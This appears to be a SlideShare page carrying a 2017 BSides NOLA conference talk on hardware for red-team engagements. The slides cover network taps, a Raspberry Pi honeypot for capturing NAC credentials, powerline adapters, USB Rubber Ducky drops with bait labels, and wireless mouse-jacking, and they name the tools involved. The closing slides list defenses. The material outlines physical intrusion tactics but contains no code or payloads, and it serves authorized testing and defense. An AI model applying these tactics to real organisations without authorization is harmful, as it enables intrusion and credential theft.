Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Security Risk Advisors - BSides NOLA 2017 - Your New Red Team Hardware Survival Pack

A few years ago all you needed was a 4 port switch and Kali VM to reliably bypass most controls and have domain admin in a few hours. Defenses and networks have improved and so should your red team arsenal. Spoiler alert; you’re going to need a bigger backpack. This talk will provide a practical guide to bypassing NAC controls, taking over workstations from the parking lot, and breaking into locked PC’s. We’ll walk through 5 different hardware devices; how to build them, use them effectively, and how to protect against them.

Related Books

Free with a 30 day trial from Scribd

See all
  • Be the first to comment

  • Be the first to like this

Security Risk Advisors - BSides NOLA 2017 - Your New Red Team Hardware Survival Pack

  1. 1. YOUR NEW RED TEAM HARDWARE SURVIVAL PACK Chris Salerno | DanAstor | Chris Myers Bsides NOLA: 2017
  2. 2. WHY MORE HARDWARE?  Networks are getting better  Visibility + Security  Detection is getting better  Rogue devices +Traffic analysis  Clients listening to recommendations  Finally…
  3. 3. TOOLS WE’LL BE COVERING  NetworkTaps  Raspberry Pi’s  Ethernet Over Power Line Adapters  USB Rubber Duckies  Mouse Jacking
  4. 4. NACS AND ATTACKS  Network Access Control (NAC)  Passive Attacks  NetworkTAPs + Packet CAPs  Active Attacks  Pi’s + Power Lines + Air Freshener orTissue Box
  5. 5. NETWORKTAPPIN  Problem  No Creds and Can’t DoTraditional Recon  Solution  Power LineAdapter + NetworkTap + Packet Caps  Sniff… Sniff…  Host + Network Info  Credentials (Network/Smart Printers or Switch Uplinks  )  PoE pass-through is a nice feature
  6. 6. NETWORKTAPPIN
  7. 7. PI GOT UR NAC?  Problem  Active NAC attempts to auth to any system plugged in along with host checking  Solution – NAC Honeypi  Raspberry Pi + Power LineAdapter + Air Freshener orTissue Box  SSH Honeypot  Cowrie based  https://github.com/micheloosterhof/cowrie  Responder  https://github.com/lgandx/Responder
  8. 8. HONEYPI DEMO
  9. 9. I’VE GOTTHE POWER  Problem  Need to Hide Physical Location  Solution  Ethernet over Power Line  Simple to use  Transmits signal here to there  Allows for stealthier ops  Hide network taps  Hide raspberry pi’s  Hide origin of systems/traffic
  10. 10. ETHERNET OVER POWER LINE ADAPTERS
  11. 11. USB DROPS & SCREEN UNLOCKS  Problem  Need Shellz but Can’t Plug Into the Network  Solution – Getting Shellz  USB Rubber Ducky  Inherently trusted in most environments  Easy to pretend to be a keyboard  https://hakshop.com/products/usb-rubber-ducky-deluxe  Labels may help: Beach Pics, Harassment Evidence, HR, etc..  Curious Users  They plug anything in…  Or take to HR, who then plug it in…
  12. 12. WHEN USB DUCKS ATTACK…  Ducky Script  Load a custom payload onto your Rubber Ducky  https://ducktoolkit.com/  PowerShellAttacks, Drop Malware, Etc.  Attack Scenarios  USB Drops  Go Aggro!  Or slightly less aggro…
  13. 13. PERIPHERAL ATTACKS?  Problem  Need Shellz but Don’t Have Physical Access  Solution  Wireless peripherals + keystroke injection  Logitech Unifying Receivers  Assorted Microsoft Keyboards + Mice  Can exploit to get remote C2’s  Arduino Mouse Jacker  https://github.com/phikshun/uC_mousejack  JackIt  https://github.com/insecurityofthings/jackit
  14. 14. RUBBER DUCKY & JACKIT DEMOS
  15. 15. SOWHAT NOW??  USB Rubber Duckies  HID/USB device whitelisting (GPO)  Epoxy USB ports  Mouse Jacking  Provide wired/non-vulnerable peripherals  Log external calls for PowerShell  Patch it yourself
  16. 16. SOWHAT NOW??  Powerline Adapters + NetworkTap  Physical security & user awareness  Limit use of clear text protocols  Raspberry Pi  Rogue device detection  Don’t auth to every system  Ensure NAC service account passwords are complex as in RANDO…  Don’t SSH auth to every system… (or use certs)
  17. 17. QUESTIONS?

×